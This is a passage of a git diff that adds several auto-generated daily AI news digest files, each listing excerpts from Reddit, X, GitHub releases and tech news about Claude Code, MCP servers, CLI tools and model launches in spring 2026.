Store](https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server expose it to + +--- + +## [LosslessCut v3.68.0 released](https://github.com/mifi/lossless-cut/releases/tag/v3.68.0) +*GitHub Releases · LosslessCut* | 29/01/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311) Note: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut + +--- + +## [I built a Kanban board for Claude Code so I can run agent sessions straight from cards](https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.54 +Tags: open_source, cli_tool + +> I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done. So I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). Each card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done. It turned Claude from "a terminal I talk to" into + +--- + +## [Are we underweighting execution benchmarks when we talk about open-source frontier models?](https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/) +*Reddit r/StableDiffusion* | 29/04/2026 | Score: 1.00 +Tags: open_source + +> A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier. Ling-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling. If more frontier open models + +--- + diff --git a/data/digest-2026-04-30.md b/data/digest-2026-04-30.md new file mode 100644 index 0000000..581a568 --- /dev/null +++ b/data/digest-2026-04-30.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-04-30** | 15 stories | Auto-generated from 692 archived stories + +--- + +## [[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read](https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/) +*Reddit r/ClaudeAI* | 30/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc). We built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv + +--- + +## [The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now.](https://x.com/AI_BioPhD/status/2049769860897321027) +*X / @ai_biophd* | 30/04/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> The "Big Tech Steamroller" is coming for your AI agent. Before you write another line of code, ask yourself: "Can a trillion-dollar company do this with a single API update?" If the answer is yes, pivot now. + +--- + +## [Cursor SDK — The Democratization of Agent Development](https://x.com/Marktechpost/status/2049711306643759265) +*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment. + +--- + +## [Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:](https://x.com/Codex_Changelog/status/2049905403262079480) +*X / @codex_changelog* | 30/04/2026 | Score: 0.97 +Tags: cli_tool, tool_update + +> Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog: + +--- + +## [Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell](https://pu.dev/) +*Hacker News* | 30/04/2026 | Score: 0.88 +Tags: cli_tool, agent_tool + +--- + +## [26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.](https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/) +*Reddit r/ClaudeAI* | 30/04/2026 | Score: 0.86 +Tags: mcp, open_source + +> Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it. LightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). About 47K lines of Go, 114 MCP too + +--- + +## [pnpm v11.0.3 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.3) +*GitHub Releases · pnpm* | 30/04/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ## Patch Changes * Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412). * Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na + +--- + +## [Vercel CLI @vercel/python-workers@0.0.20 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20) +*GitHub Releases · Vercel CLI* | 30/04/2026 | Score: 0.76 +Tags: developer_tool, cli_tool + +> ### Patch Changes - 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers + +--- + +## [Gemini CLI v0.40.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1) +*GitHub Releases · Gemini CLI* | 30/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> ## What's Changed * fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/26268 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1 + +--- + +## [X announces a rebuilt ad platform powered by AI](https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Stripe introduces Link, a digital wallet that autonomous AI agents can use, too](https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [The MCP Era Feels Like Déjà Vu 1 day ago • 3](https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu) +*Hugging Face Blog* | Score: 1.00 +Tags: mcp + +--- + +## [Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…](https://x.com/ClaudeDigest/status/2049902211292127462) +*X / @claudedigest* | 30/04/2026 | Score: 1.00 +Tags: mcp + +> Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code … + +--- + +## [81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.](https://x.com/polsia/status/2049901864381288455) +*X / @polsia* | 30/04/2026 | Score: 1.00 +Tags: agent_tool + +> 81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process. + +--- + +## [MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights](https://x.com/itsPaulAi/status/2049862276832715177) +*Aligned News (Scoble)* | 30/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. The gap is closing fast. + +--- + diff --git a/data/digest-2026-05-01.md b/data/digest-2026-05-01.md new file mode 100644 index 0000000..ac9324c --- /dev/null +++ b/data/digest-2026-05-01.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-01** | 15 stories | Auto-generated from 600 archived stories + +--- + +## [Built + open sourced anti-slopsquatting CLI](https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 +Tags: open_source, developer_tool, cli_tool + +> TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators. Repo: https://github.com/zhendahu/dep-doctor There's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s + +--- + +## [Vercel CLI @vercel/python-workers@0.0.21 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21) +*GitHub Releases · Vercel CLI* | 01/05/2026 | Score: 0.62 +Tags: api_update, developer_tool, cli_tool + +> ### Patch Changes - 6935baa: Refactor Python queue sdk into `_queue/` - 574c9f1: [vercel-workers] Replaces retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6) + +--- + +## [Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…](https://x.com/firstadopter/status/2050264818972516799) +*X / @firstadopter* | 01/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..” + +--- + +## [One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…](https://x.com/OpenAI/status/2050250926888468929) +*X / @openai* | 01/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing. + +--- + +## [Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.](https://x.com/yunara97/status/2050108352550592636) +*X / @yunara97* | 01/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers. + +--- + +## [Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast](https://x.com/NousResearch/status/2049878944007041210) +*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. The open-source agent ecosystem is maturing quickly. + +--- + +## [Whohas – Command-line utility for cross-distro, cross-repository package search](https://github.com/whohas/whohas) +*Hacker News* | 01/05/2026 | Score: 0.99 +Tags: developer_tool, cli_tool + +--- + +## [Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.](https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.86 +Tags: product_launch, tool_update + +> https://vexjoy.com/posts/cloud-skills-are-still-just-skills/ The skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect. If Anthropic ships more features this way, the ecosystem splits into ope + +--- + +## [Found Zero day Claude Desktop + Chromium bug need to know where to submit report.](https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. Please let me know where I can submit this report. + +--- + +## [Example of using the GodotIQ MCP with Coding Agent to create video games](https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: mcp, agent_tool + +> I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor. To test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca + +--- + +## [Mobile App with Clade](https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.70 +Tags: developer_tool, tool_update + +> Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses "Add to Homescreen" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h + +--- + +## [Turbo v2.9.7 released](https://github.com/vercel/turborepo/releases/tag/v2.9.7) +*GitHub Releases · Turbo* | 01/05/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ## What's Changed ### eslint * chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604 ### Examples * feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595 * chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600 * examples + +--- + +## [Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits](https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/) +*Reddit r/ClaudeAI* | 01/05/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off. So I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s + +--- + +## [You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…](https://x.com/_stephenbishop_/status/2050263244020015404) +*X / @_stephenbishop_* | 01/05/2026 | Score: 1.00 +Tags: mcp + +> You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta + +--- + +## [VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale](https://x.com/veedstudio) +*Aligned News (Scoble)* | 01/05/2026 | Score: 1.00 +Tags: product_launch + +> VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications. + +--- + diff --git a/data/digest-2026-05-02.md b/data/digest-2026-05-02.md new file mode 100644 index 0000000..c8c52d3 --- /dev/null +++ b/data/digest-2026-05-02.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-02** | 15 stories | Auto-generated from 459 archived stories + +--- + +## [@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts](https://x.com/WesRoth/status/2050606311440531809) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, product_launch, cli_tool, tool_update + +> Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language. + +--- + +## [I built a Claude Code skill that gives Claude real local time + session tracking (open source, one-line install)](https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says "the current time" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \- Auto-detects your timezone on install, no API key, no network call \- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \- Logs every session start/end so Claude can answer "how long have we been talking" or "what did I say 20 minutes ago" \- Persists in a local JSON file (or shares with another memory plugin via $TIME\_ANCHOR\_MEMORY\_PATH) \- \~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \- covering \~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel… + +--- + +## [Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)](https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/) +*Reddit r/StableDiffusion* | 02/05/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent. Parallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly. Apache 2.0, local-first, zero network calls. github.com/Thatayotlhe04/Par + +--- + +## [Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.](https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time? + +--- + +## [Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…](https://x.com/HudBeer/status/2050622456436818111) +*X / @hudbeer* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins. + +--- + +## [Weekly Meal Planning Fully Automated with Claude and Migros MCP](https://x.com/hslu_aiml/status/2049100936287498456) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end. + +--- + +## [@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement](https://x.com/ValsAI/status/2050240263420072446) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index. + +--- + +## [I built "Semvec": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)](https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: mcp, agent_tool + +> Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \- Constant-size compressed context: Token-reduced LLM context that stops growing. \- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs… + +--- + +## [The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻](https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/) +*Reddit r/ChatGPT* | 02/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻 + +--- + +## [I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]](https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/) +*Reddit r/ClaudeAI* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo) + +--- + +## [Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…](https://x.com/genondemand3d/status/2050539325763293222) +*X / @genondemand3d* | 02/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow + +--- + +## [xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-tim…](https://x.com/mehedi_u/status/2050462001571504588) +*X / @mehedi_u* | 02/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building + +--- + +## [Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It](https://x.com/aakashgupta/status/2050349093969694825) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition. + +--- + +## [Pika Just Let You Give Claude a Face and Make Videos Through Conversation](https://x.com/pika_labs/status/2050294291998933455) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access. + +--- + +## [NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize](https://x.com/NVIDIAAI/status/2050336285428998202) +*Aligned News (Scoble)* | 02/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability. + +--- + diff --git a/data/digest-2026-05-03.md b/data/digest-2026-05-03.md new file mode 100644 index 0000000..e865486 --- /dev/null +++ b/data/digest-2026-05-03.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-03** | 15 stories | Auto-generated from 379 archived stories + +--- + +## [EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.](https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> • Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 [https://github.com/kigy1/EasyUI] + +--- + +## [Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community](https://x.com/Shaughnessy119/status/2042339593647800404) +*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability. + +--- + +## [Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags](https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> \--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think. + +--- + +## [OpenClaw v2026.5.2 released](https://github.com/openclaw/openclaw/releases/tag/v2026.5.2) +*GitHub Releases · OpenClaw* | 03/05/2026 | Score: 0.91 +Tags: developer_tool, cli_tool + +> ### Highlights - External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc. - Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs. - Control UI and WebChat are more resilient across + +--- + +## [pnpm v11.0.4 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.4) +*GitHub Releases · pnpm* | 03/05/2026 | Score: 0.84 +Tags: developer_tool, cli_tool + +> ## Patch Changes * Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427). * Remove pnpm's workspace state file when cleaning node\_modules so `pnpm ci` performs a fresh install after the clean step. * Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`. + +--- + +## [Turbo v2.9.8 released](https://github.com/vercel/turborepo/releases/tag/v2.9.8) +*GitHub Releases · Turbo* | 03/05/2026 | Score: 0.70 +Tags: github_release, tool_update + +> ## What's Changed ### @turbo/repository * chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636 ### Changelog * release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679 * test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681 * docs: Clarify root task guidance by @anthon + +--- + +## [Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31](https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory) +*Hugging Face Blog* | Score: 1.00 +Tags: open_source + +--- + +## [Built this over the weekend because dataset prep was annoying af](https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so 